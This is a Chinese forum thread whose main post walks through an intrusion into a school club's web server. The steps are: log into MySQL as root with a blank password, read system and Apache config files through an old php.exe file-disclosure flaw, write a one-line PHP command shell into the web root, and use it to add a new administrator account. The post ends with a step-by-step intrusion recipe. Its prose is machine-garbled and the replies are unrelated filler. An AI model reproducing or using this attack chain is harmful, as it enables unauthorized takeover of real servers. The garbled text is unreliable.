仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 848|回复: 8
打印 上一主题 下一主题

[学习教程] 发布看紧你的3306端口,一次经由过程mysql的进侵

[复制链接]
透明 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 20:14:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
当然,或许这并不是我们拒绝MySQL的一个有说服力的MySQL学习教程,但是对于一些比较守旧的IT经理来说,在为一些关键业务选择平台的时候,平台的成熟性却是必须要考虑的一个因素,在这一点上,MySQL无疑毫无优势。用superscan扫了一下
某个c类的网段,寻觅开放80端口的呆板,了局就只要一台呆板
开放了80端口,试着连了一下,是我们黉舍某个社团的的主页。
从端口的banner来看应当是apache(win32),证明一下
telnet211.87.xxx.xxx
get(回车)
<!DOCTYPEHTMLPUBLIC"-//IETF//DTDHTML2.0//EN">
<HTML><HEAD>
<TITLE>501Method
NotImplemented</TITLE>
</HEAD><BODY>
<H1>MethodNotImplemented</H1>
getto/index
.htmlnotsupported.<P>
Invalidmethodinrequestget<P>
<HR>
<ADDRESS>Apache/1.3.2
2Serveratwww.xxxxxx.comPort80</ADDRESS>
</BODY></HTML>


丢失对主机的毗连。
C:>
呵呵,这下看得更分明了

据我推测,应当是"apache+MySQL+php"的黄金组合吧
习气性的mysql-h211.87.xxx.xxx
公然连上了
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis17toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>

断开试着
mysql-h211.87.xxx.xxx-uroot-p
passWord:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>
呵呵,人人看到了他的root用户没有暗码,这是我明天要说的第一个主题。
这是相称的伤害的,遇见这类情形,有99.999%的大概能够进进
既然利用的apache+php,只需找到他在当地寄存的web的物理路径就随心所欲了
呵呵
下一个成绩是我明天要说的重点怎样才干晓得那台主机的寄存的web的物理路径?
办法有良多种,在这里我先容2种办法供初学者参考
起首要告知人人的是低版本的apache+php有一个毛病
提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就能够把谁人物理文件下载上去。

因而提http://211.87.xxx.xxx/php/php.exe?c:a.txt
前往
Noinputfilespecified.(没有这个毛病的话提醒找不到网页)
好的,这申明他有这个毛病。
在提http://211.87.xxx.xxx/php/php.exe?c:oot.ini
前往
[bootloader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS[Operating

systems]multi(0)disk(0)rdisk(0)partition(1)WINDOWS="MicrosoftWindowsxpPRofessional"

/fastdetect
呵呵,装的仍是xp。
好了,我们能够推测对方apache的conf文件的物理地位了
http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?c:ProgramFilesapacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf
猜到了,前往了很多多少器材
找到我们想要的
#DocumentRoot:Thedirectoryoutofwhichyouwillserveyour
#documents.Bydefault,allrequestsaretakenfromthisdirectory,but
#symboliclinksandaliasesmaybeusedtopointtootherlocations.
#
DocumentRoot"D:homepage"
看得出来对方的主目次是D:homepage
上面的事就好办了,如今就想失掉shell?
先别急,我们先来看看另外一种办法
那就是使用mysql的毛病
任意的扫瞄一下他的网页找到一处使用mysql的中央
http://211.87.xxx.xxx/skonline/study/list.php?id=14

长得太帅了,哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
前往
Warning:SuppliedargumentisnotavalidMySQLresultresourcein

d:homepageskonlinestudylist.phponline231
呵呵,一清二楚。
然后,然后就是打造我们的shell
mysql-h211.87.xxx.xxx-uroot-p
password:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>usetest;
Databasechanged
mysql>createtablet(cmdtext);
QueryOK,0rowsaffected(0.08sec)

mysql>insertintotvalues(<?system($c);?>);
QueryOK,1rowaffected(12.52sec)

mysql>select*fromtintod:homepage        est.php;

我的shell很复杂<?system($c);?>,不到20个字符,但他已充足了
可让我实行恣意命令,由此足以看出php的壮大。

怎样用?
提交
http://211.87.xxx.xxx/test.php?c=net;userkid/add
命令乐成完成
http://211.87.xxx.xxx/test.php?c=net;localgroupadministratorskid/add
命令乐成完成

呵呵,测试乐成,经由过程!
剩下的就是你自在发扬了。

由此我们不难总结出这一类的进侵步骤:
1,找到没有暗码的3306端口
2,找到对方的web物理路径
3,打造shell
4,后续事情

呵呵,在这里提示人人,假如你想要或正在用mysql的时分
万万要给本人的root设上一个强无力的暗码。
看紧你的3306,呵呵。
如果互联网服务提供商,支撑数据的云服务,或它们之间任一点网络被堵塞或中断,他们就会遇到与数据延迟或应用程序故障有关的问题。如果问题发生在企业内部,解决方案提供商可以排除故障找出原因。
若天明 该用户已被删除
沙发
发表于 2015-1-18 19:18:17 | 只看该作者
这就引发了对varchar和char效率讨论的老问题。到底如何分配varchar的数据,是否会出现大规模的碎片?
简单生活 该用户已被删除
板凳
发表于 2015-1-25 23:25:58 | 只看该作者
可能有的朋友会抱怨集成的orderby,其实如果使用ranking函数,Orderby是少不了的。如果担心Orderby会影响效率,可以为orderby的字段建立聚集索引,查询计划会忽略orderby操作(因为本来就是排序的嘛)。
深爱那片海 该用户已被删除
地板
发表于 2015-2-4 13:21:52 | 只看该作者
作了些试验,发现使用CLR的存储过程或函数在达到一定的阀值的时候,系统性能会呈指数级下滑!这是非常危险的!只使用几个可能没有问题,当一旦大规模使用会造成严重的系统性能问题!
老尸 该用户已被删除
5#
发表于 2015-2-9 23:36:57 | 只看该作者
同样会为索引视图等应用带来麻烦。看看行级和事务级的快照数据放在tempdb中,就能感觉到目前架构的尴尬。
小妖女 该用户已被删除
6#
发表于 2015-2-28 08:54:20 | 只看该作者
一个百万级别的基本信息表A,一个百万级别的详细记录表B,A中有个身份证id,B中也有身份id;先要找出A中在B的详细记录。
乐观 该用户已被删除
7#
发表于 2015-3-9 22:02:03 | 只看该作者
但换公司用MSSQL2K感觉自己好像根本就不了解MSSQL。什么DTS触发器以前根本没用过。
若相依 该用户已被删除
8#
发表于 2015-3-17 02:09:21 | 只看该作者
还不是性能有问题!否则面向对象的数据库早就实现了!建议使用CLR的地方一般是和应用的复杂程度或操作系统环境有很高的耦合度的场景。如你想构建复杂的算法,并且用到了大量的指针和高级数据模型。
分手快乐 该用户已被删除
9#
发表于 2015-3-23 17:11:11 | 只看该作者
而SQLServer如果能像Oracle一样可以为登陆分配如:5%的cpu,10%的内存。就可以解决这个漏洞。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 06:10

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表